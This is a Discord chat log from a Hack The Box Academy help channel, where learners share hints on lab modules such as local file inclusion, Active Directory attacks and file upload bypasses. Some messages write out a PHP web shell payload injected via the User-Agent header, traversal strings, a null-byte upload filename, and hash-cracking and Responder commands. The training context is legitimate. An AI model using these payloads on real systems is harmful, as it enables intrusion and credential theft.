I was in your position not too long ago

but For the past months I have been putting in my all

ya

And I have come really far

well its great to see someone who's made progress

I mean are there people that are advanced hackers in this Discord that I can ask for mentorship?

Read email if anyone interested https://mediatemple.net/community/products/vps/204404584/sending-or-viewing-emails-using-telnet

I feel like there are a lot of people like yourself who can help me but I thought I would sak

you give very good advice btw

I wouldn't call myself extremely advanced but I can give you mentorship

ok thanks

that would be great

is CBBH something I can complete in six months?

Depends on the person

ok

I think you totally could

ok

I don't think you should ever rush learning tho

Always focus on the journey

ok thanks

ok

I can add you to my discord server and you can go crazy with questions about hacking

ok sure

If you want mentorship

sure

Guys and Gals I am on the stack based buffer overflow for windows and I am trying to create the pattern.wav file to control of the EIP. I Followed the instructions for python as mentioned but when I run the code it pops up IDLE shell but does not generate the .wav file. Any idea what I might be missing in my steps?

@vital adder any hints on how you ended up defeating it?

Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?

the Attacking DNS section? after you found all of the subdmain dump "all available record" ||(DNS zone transfer)|| also the subdomain that have the flag start with an ||h|| but it isn't ||helpdesk||

if subbrute are too slow use gobuster but if you can't find it with gobuster use subbrute and remember to use the custom name server

.

yes but it doesn't give me anything. i though it was that bcs of the way the question is asked

im stuck on the skills assessment for the lfi module and i know you have to log poisen but i can't seem to be able to lfi to the log file: ilf_admin/index.php?log=/var/log/apache2/access.log

can anybody tell me how to recover facebook id if forget the password

../../../../

nope i forgot to mention i tried mutiple direcotry traversals

i can get the passwd file

nothing else though

Are you sure the server is apache2 and not something else?

what else could it be?

another very popular web server

yeah i found out its Nginx

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

also it seems to block the <?php system($_GET["cmd"]); ?>

the log files

Hi there everyone!

I have a couple of questions regarding the imap/pop3 footprinting assessment

I have completed all the questions successfully but I am not sure I understand some of the commands I used

For example 1 fetch <Id> which is detailed in the module of HTB what is Id exactly? Searching the web I used ||1 FETCH 1 Rfc|| and it worked once logged in the server but don’t exactly find out why?

If anyone could briefly explain I would appreciate that

Dm

No it doesnt, you dont have to poison nginx logs.

Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?

use JOHN

@summer lava I tried using John with the rockyou list to no avail

@summer lava Bruteforcing the NTLM hash takes too long ...

i solved it by poisoning nginx logs, but there are certainly other ways

Directly not,|| i poisoned self environ ||

Hey, I'm struggling in the Documentation and Reporting module, the skills assesment, could anyone help?

||john -w=/../../../../rockyou.txt hash.txt|| Should work so find, if not what module is that ?

@summer lava I'm in Windows Privilege Escalation on https://academy.hackthebox.com/module/67/section/606

@summer lava Thank you for your assistance. copied the hash values wrong. My bad

🤏 You're welcome.. always be watchfully... In hacking you have to turn every single stone that you can lift without crashing it.. no noise

ay sir

what is the command you're usin and from which location are u running it?

i ran responder on the linux machine that we have access without success, grabbed IPs with fping, scanned them with nmap, used kerbrute to find 57 valid usernames and tried some passwords with a valid username with crackmapexec, enum4linux didn't gave me anything

and i can't get password policy with tools such as ldapsearch or rpcclient

Haha, literally the same thing just happened to me. It didn't work, then I wen here looking for answers and I found yours. I respawned the machine and just repeated the exact same thing I did before (which didn't work) and all of a sudden it works like a charm...

i used responder -I ens224

from the linux machine on the domain

same but nothing went

o.O whaat

it ran like 15min

wow that's so weird idk why it's not working.

that is not normal behavior

ok thx

maybe put it as spoiler

so i ran responder and got a hash that i used hashcat on w/mode 5600

that's what comes out

idk how

yeah that's what i expected

it's ||spoiler||

i just delete it nbd u seen it

fresh 🙂

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

Do you still need help with this?

help por favor

yes directly, you can use user agent for example

help por favor it for the simply answer in htb academy

Can someone tell me where I can find sweet potato.exe or how to compile it into executable pls

i am stuck on the skills assesment on the lfi module https://academy.hackthebox.com/module/23/section/513 i have gained lfi but can't gain rce

For AD enumeration & attacks assessment part 2, submit the flag fin the administrators desktop on the sql01 host, should we be able to connect to it with mssqlclient.py?

I'm working my way through the Bash scripting module (module 21) and have the question Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
script removed
What is wrong with this? I am getting no output
*edit The question is WRONG, it is not more than 113,469 characters!

may i ask how because i have used burp suite and curl -s '/ilf_admin/index.php' -A '<?php system($_GET["cmd"]); ?>'

Hi, i'm actually doing the PASSWORD ATTACKS module and i'm blocked on the question " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer. " i used the ressources zip like they said. i tried different way but still got no result. may be i'm doing something wrong but can't tell what.

i moved on and tying to find how to use the 2nd user we found

DM

Yea

I’m trying to connect from the Linux host they provide but getting a “login is from an untrusted domain” error, when i try to use mssqlclient

Mssqlclient domain/user@serverip -dc-ip dcserverip

Don’t use .local in your cmd

This worked. Thanks, I’ve been stuck on this all day

Glad to help

Can somebody please help me ?
Iam stuck at the "Command Injection Skills Assessment"
I already found the injection point and i just get a "Permission denied"

@shadow willow DM me 🙂

where is locate the wordlist with dirb i don't find

it is empty

when i go /usr/bin/wordlist

@knotty summit its not here?

no i don't have the file dirb

what happens if you run: locate dirb

it empty

you can find the dirb wordlists on github if you need them

i tried

i must download every file on per one

how download the wordlist dirb ?

https://github.com/v0re/dirb/blob/master/wordlists/common.txt

Need that WD?

i don't know how download the complete wordlist

dirb is a directory „/usr/share/wordlist/dirb“
which wordlist do you mean ?

the whole wordlist

i don't have access to dirb

i have install dirb but i don't have thre complete repertory

only /usr/share/wordlist/

did you tried
cd /usr/share/wordlists/dirb/

ls

?

yes

i don't have dirb

it stop to /usr/share/wordlist

no dirb

sudo apt install dirb

cd /usr/share/wordlists/dirb/

i tried it out it works

I've already done ok it is a mystery

i don't understand why i don't have the repertory dirb

which Distro do you have ?

kali

Shells and Payloads -> The Live Engagement, final host. Little stuck, enumerated and gained access via web shell to a user account but not sure how to escalate privileges. Tried the exploit it recommends too, fails. A hint or push in the right direction would be appreciated!

Hello, I have the Flag for one of the academy moduels i found but its not working idk

How did you find the file to use for this? I cracked it with hash cat was just wondering how this method works tho.

What Module and section?

Enumerate the hostname of your target and submit it as the answer. (case-sensitive) I got the HTB {answer}

but it isnt working

Right, but what module?

should say at the top of the page

network enumeration

You have to use namp to scan your target machine

its not in /usr/bin/ its in /usr/share/wordlists/

/usr/share/dirb/wordlists on my kali box

dirb before wordlists ?? thats really odd

Yeah, that's probably why they had trouble finding it!

so you dont have /usr/share/wordlists?

I do

but dirb had to be different 🙄

it was installed by default in all my vms

So you know I'm not making things up!

lol I believed you just not sure why you had to install it to begin with

I didn't it was already there

Litterally have never heard of that

where did you get your iso lol

I used the VB image from kali.org

quite a very funny question

why is that?

I have a question for the Attacking Common Services Lab - Easy. Would someone be able to assist please?

wow!! I just looked and have a dirb folder in /usr/share as well. but in wordlists there is a dirb folder with lots in it.

More than this then? ```──(kali㉿kali)-[/usr/share/dirb/wordlists]
└─$ tree
.
├── big.txt
├── catala.txt
├── common.txt
├── euskera.txt
├── extensions_common.txt
├── indexes.txt
├── mutations_common.txt
├── others
│   ├── best1050.txt
│   ├── best110.txt
│   ├── best15.txt
│   └── names.txt
├── small.txt
├── spanish.txt
├── stress
│   ├── alphanum_case_extra.txt
│   ├── alphanum_case.txt
│   ├── char.txt
│   ├── doble_uri_hex.txt
│   ├── test_ext.txt
│   ├── unicode.txt
│   └── uri_hex.txt
└── vulns
├── apache.txt
├── axis.txt
├── cgis.txt
├── coldfusion.txt
├── domino.txt
├── fatwire_pagenames.txt
├── fatwire.txt
├── frontpage.txt
├── hpsmh.txt
├── hyperion.txt
├── iis.txt
├── iplanet.txt
├── jboss.txt
├── jersey.txt
├── jrun.txt
├── netware.txt
├── oracle.txt
├── ror.txt
├── sap.txt
├── sharepoint.txt
├── sunas.txt
├── tests.txt
├── tomcat.txt
├── vignette.txt
├── weblogic.txt
└── websphere.txt

3 directories, 46 files

I haven't needed to use it yet, so I'm not sure if there is more I might need to get from somewhere

they are identical directories

I am working on DNS Enumeration Using Python , when I finish the script it taught and run it, it raise the error : Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 982, in nameservers
raise NotImplementedError
NotImplementedError why does it happened?

even in my parrot vm I have 2 identical dirb directories

Are they actually different folders or is one a symbolic link to the other?

try adding -i to the ls commands and see if the inodes match

they do

A looks like they are linked then

So they are not actually different files, but 2 different paths that point to the same files

I am having trouble with this question.

"To get the flag, start the above exercise, then use curl to download the file returned by 'download.php' in the server shown above."

I have been doing:

cURL -O IP:Port/download.php

How do I find the flag after that?

if you are on section HyperText Transfer Protocol module Web Requests then don't use -O try with just curl IP:Port/download.php

Omfg you are a saint

nope i'm sus

looking at the code it looks like one of the nameservers being passed to it is not using TLS (https), I don't have time to dig into the code now though

Hey i wonder if anyone could help with the Active Directory LDAP module , the question What is the domain functional level?, I really don't know why my answer its not correct, i am using the same tools.
Edit: I found the answer, I really consider you may update that module, its very expensive , and the commands you put there are for the old version python2 from Windapsearch.

Can I get a hand with Broken Auth -> Predictable Reset Token?
I think I'm supposed to generate a token using the same timestamp as htbuser, but changing the username to make the token for htbadmin instead
When I find the timestamp for the token used in htbuser, it doesnt work for htbadmin
Am I misreading the question?

didn't both of the highest ports are refuse to connect? Network issue. Working after reset machine

I impersonate to that right user(previous question). But couldn't run EXECUTE sp_configure 'show advanced options', 1

EXACTLY MY POINT...

why I'm not able to do that if I'm already holding the role sysadmin

related to this one? https://stackoverflow.com/questions/28794079/windows-administrator-doesnt-have-permission-on-sql-server

tried ALTER DATABASE [yourDB] SET TRUSTWORTHY ON; not working either

Have you found the linked DB server?

||LOCAL.TEST.LINKED.SRV||

Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.

DM

Have you found a solution?
Otherwise DM me

for DnsAdmins module?

Hello

👋

dm if you're still stuck - this was a really brutal module

hey can somebody help me out with the Local File inclusion skill assessment?

i've found the admin panel and i have access to the access.log file

i tried log poisoning i found that i can inject some text but not the cmd command

Have you tried to install a webshell via the || User-Agent ||?

Yes i tried it

hey I have found the solution. The issue was with my cmd command when I tried to install the webshell

thank you

Did you find a solution to this? As a DotNet developer I use SqlServer in a docker container. If this is the case for machine have you looked at the default creds that they posted on the doker official image page?

Can someone help me in the ACL abuse Tactics section in the Active directory enumeration and attacks module

@rustic sage feel free to DM 🙂

Ca. Someone nudge me in the right direction to get user hash for Active Directory skills II question 10 I am running inveigh from ms01 but gets nothing

hello! I am stuck on the same point Is there any chance could you help me?

Any Tmux users here? I have a question about how to do something

@light yacht i might be able to help!

I can try answering your question

Thank you so much ! May I dm you ?

can you help me with this? every time inject the php code, the user agent doesn't get logged and nothing after that curl request gets logged either.

sure

can anyone give me some help on Web Attacks Bypassing Encoded References ? I'm not getting a post request nor a modifiable variable when I intercept with Burp.

@night pier i might be able to help 🙂

Yes i believe that's the section we were speaking about

Anyone here on Active Directory skill 2?

Need help with question 10

Can anyone help me pls with "File Upload Attacks" Whitelist Filters ? 🙂
I uploaded my script with for example (shell.php%00.jpg) but i cant find it <.<

profile_images

yeah thank you ..
But i have a other problem 😄

if i upload something like this:
testpic23.php/x00.png
And the server says "successful uploaded"
That would mean that i can find it with
profile_images/testpic23.php

Or am I wrong?

I can help you

you have to look for the whole file name

yeah but if i search for it i get a 404

can anyone point me in the right direction for the Bypassing Encoded References module?

Good evening can I get some help on the: Information Gathering: Web Edition (module) --> Active Subdomain Enumeration ---> What is the FQDN of the IP address 10.10.34.136?

can anyone help me with this, I got the cubes but in a rude way.I think there's a better way for this

Cheers, was just misunderstanding the question, got it in the end though

I'd say keep looking at other filenames rather than fixating on one that seemed to work

I have the flag 😁

Good stuff

I had thought far too complicated even though the answer was so easy

@wind plaza sec i will DM you 🙂

yo can i dm u i have a question

sure

Happens to me all the time too 😵‍💫

If you do a zone transfer on inlanefreight you will see a bunch of sub domains. Do a zone transfer on those until you find the one with the info you need

do u have to do htb boxes to change the color of your discord name?

I think you can also do the challenges
Just need to do something that gets you score

ok tnx

Solving active challenges and machines will contribute to your rank in HTB, will subsequently change your Discord colour AFAIK.

anyone to offer help Active Directory skills 2 #10?

what was the question ?

crack the users password

was trying to figure out how to get Inveigh to work

was cumbersome but got it from SQL01

Thank you John, I found the solution. The random things on stackoverflow that I tried are not the case. Have to go into another linked service instead

@normal laurel ya dawg i got u 🙂

Hey silly question here but for the SMTP footprinting section it says to use the provided wordlist to get the username. My issue is I haven’t a clue where that is. Would anybody mind telling me where it might be lmao

@pure silo check the Resources at the top of the page

I'm going to be completely honest but i had no clue that tab even existed

thank you

lol np

Hello, I'm new, and honestly I don't know much about programming, and I need to know what to start with and what things are important to know, could someone help me to guide me?